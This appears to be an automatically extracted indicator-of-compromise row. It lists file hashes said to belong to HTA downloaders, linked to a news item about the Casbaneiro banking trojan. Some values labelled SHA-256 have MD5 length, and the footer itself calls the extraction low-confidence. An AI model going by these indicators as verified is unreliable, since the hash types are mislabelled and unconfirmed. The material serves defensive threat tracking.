| sha256 | 5a76669ec410d0b3e21112a4a6fd3207976b299ee27c5fc3d42f2673170ab95e | f537a02949315eb768c88906b0c65add HTA downloader HTA SHA-256 5a76669ec410d0b3e21112a4a6fd3207976b299ee27c5fc3d42f2673170ab95e HTA downloader HTA SHA-256 8092b9de455463296898fcaf8c9955d1 | Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites Cyber Security News | · 1d ago |
Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.